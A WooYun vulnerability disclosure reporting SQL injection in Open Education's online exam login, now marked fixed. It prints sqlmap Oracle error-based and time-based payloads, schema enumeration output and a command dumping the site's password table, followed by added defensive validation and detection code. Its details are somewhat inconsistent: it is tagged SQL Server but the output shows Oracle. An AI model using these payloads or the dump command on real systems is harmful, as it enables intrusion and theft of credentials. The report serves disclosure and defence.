SQL injection in an Open Education (奥鹏教育) computer-based exam system

ID: 176322
Url: http://www.wooyun.org/bug.php?action=view&id=176322
Status: Fixed by vendor
Title: SQL injection in an Open Education (奥鹏教育) computer-based exam system
Type: SQL injection
Vendor: open.com.cn
Whitehat: 指尖上的故事
Submitted: 2016-02-17 09:16:00
Published: 2016-02-18 13:56:00
Fixed: 2016-02-18 13:56:00
Confirmed: 2016-02-17 00:00:00
Confirm Spend: 0
Tags: asp+sqlserver injection
Followers: 0
Bookmarks: 0
Whitehat rating:
Whitehat self-rated rank: 10
Vendor rating:
Vendor-rated rank: 18
Summary
.....
Details

http://exam.open.com.cn/matriculationonline/login.asp -- Open Education (奥鹏教育) Distance Education Center, entrance test on-site exam system
Request captured at the login form:

POST /matriculationonline/authenticate.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://exam.open.com.cn/matriculationonline/login.asp
Content-Type: text/xml; charset=gb2312
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: exam.open.com.cn
Content-Length: 131
Pragma: no-cache
Cookie: ASPSESSIONIDASQCRADQ=EIPCOLIBGJNLCMPMHKDDNPEN
<?xml version="1.0" encoding="gb2312"?>
<LoginInfo><UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>


The login POST is injectable....

POC

Place: POST
Parameter: Imp_userstat
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 1574=(SELE
CT UPPER(XMLType(CHR(60)||CHR(58)||CHR(105)||CHR(120)||CHR(101)||CHR(58)||(SELEC
T (CASE WHEN (1574=1574) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(114)||CHR(1
08)||CHR(118)||CHR(58)||CHR(62))) FROM DUAL)&imageField.x=23&imageField.y=10
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND 9663=DBMS_
PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84)||CHR(78)||CHR(68),5)&imageField.x=23&image
Field.y=10
---
[04:15:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.4
back-end DBMS: Oracle
[04:15:40] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[04:15:40] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HAIHONG
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WSD
[*] XDB
Enumerating the WSD schema.....
Database: WSD
[138 tables]


Dumping the table directly:
(sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)

[screenshot: 1.png]


[screenshot: dd.png]


Remediation
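As an added example (not part of the original report and not the vendor's fix), two defender-side checks for the login endpoint above: validate_login_xml enforces an allow-list on the <LoginInfo> fields of the captured request before any SQL is built, and flag_oracle_sqli scans a form-encoded POST body for the Oracle error-based and time-based signatures visible in the sqlmap POC. The function names, the digits-only rule for UserSerial and the sample bodies are assumptions constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Assumed allow-list: a student serial is digits only (the report does not say).
SERIAL_RE = re.compile(r"[0-9]{1,20}")

# Signatures of the payload families in the sqlmap POC above (Oracle XMLType
# error-based, DBMS_PIPE time-based) and the CHR()||CHR() assembly both use.
ORACLE_SQLI_SIGNATURES = [
    ("xmltype-error-based", re.compile(r"\bXMLType\s*\(", re.I)),
    ("dbms_pipe-time-based", re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\b", re.I)),
    ("chr-concat", re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
]

def validate_login_xml(body: bytes):
    """Parse a <LoginInfo> body (gb2312, as in the captured request) and
    enforce field formats before the values go anywhere near SQL."""
    try:
        root = ET.fromstring(body.decode("gb2312"))
    except (UnicodeDecodeError, ET.ParseError) as exc:
        return False, f"malformed body: {exc}"
    if root.tag != "LoginInfo":
        return False, "unexpected root element"
    serial = (root.findtext("UserSerial") or "").strip()
    password = root.findtext("UserPassword") or ""
    if not SERIAL_RE.fullmatch(serial):
        return False, "UserSerial must be 1-20 digits"
    if not 1 <= len(password) <= 64:
        return False, "UserPassword length out of range"
    return True, "ok"

def flag_oracle_sqli(form_body: str):
    """Map each form parameter to the signature names it matches ({} if clean)."""
    hits = {}
    for param, values in parse_qs(form_body, keep_blank_values=True).items():
        for value in values:
            names = [n for n, rx in ORACLE_SQLI_SIGNATURES if rx.search(value)]
            if names:
                hits.setdefault(param, []).extend(names)
    return hits

# Constructed samples: the first mirrors the captured login body, the second
# is shortened from the time-based payload in the POC.
SAMPLE_LOGIN = (b'<?xml version="1.0" encoding="gb2312"?><LoginInfo>'
                b"<UserSerial>111111</UserSerial><UserPassword>11111</UserPassword></LoginInfo>")
SAMPLE_TIME_BASED = ("Imp_username=11111&Imp_password=11111&Imp_userstat=2 AND "
                     "9663=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(84),5)&imageField.x=23")
```

Both checks are complementary: the allow-list stops malformed values at the boundary, while the signature scan is what a WAF or log-review job would run over bodies that already reached the application.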

Status history: 2016-02-17: Details sent to the vendor, awaiting vendor handling
2016-02-17: Vendor has confirmed; details disclosed to the vendor only
2016-02-18: Vendor has fixed the vulnerability and proactively disclosed it; details made public
Vendor reply: Submitted to the relevant staff for handling. -liu
Response: Severity: High, Vulnerability Rank: 18, Confirmed: 2016-02-17 10:28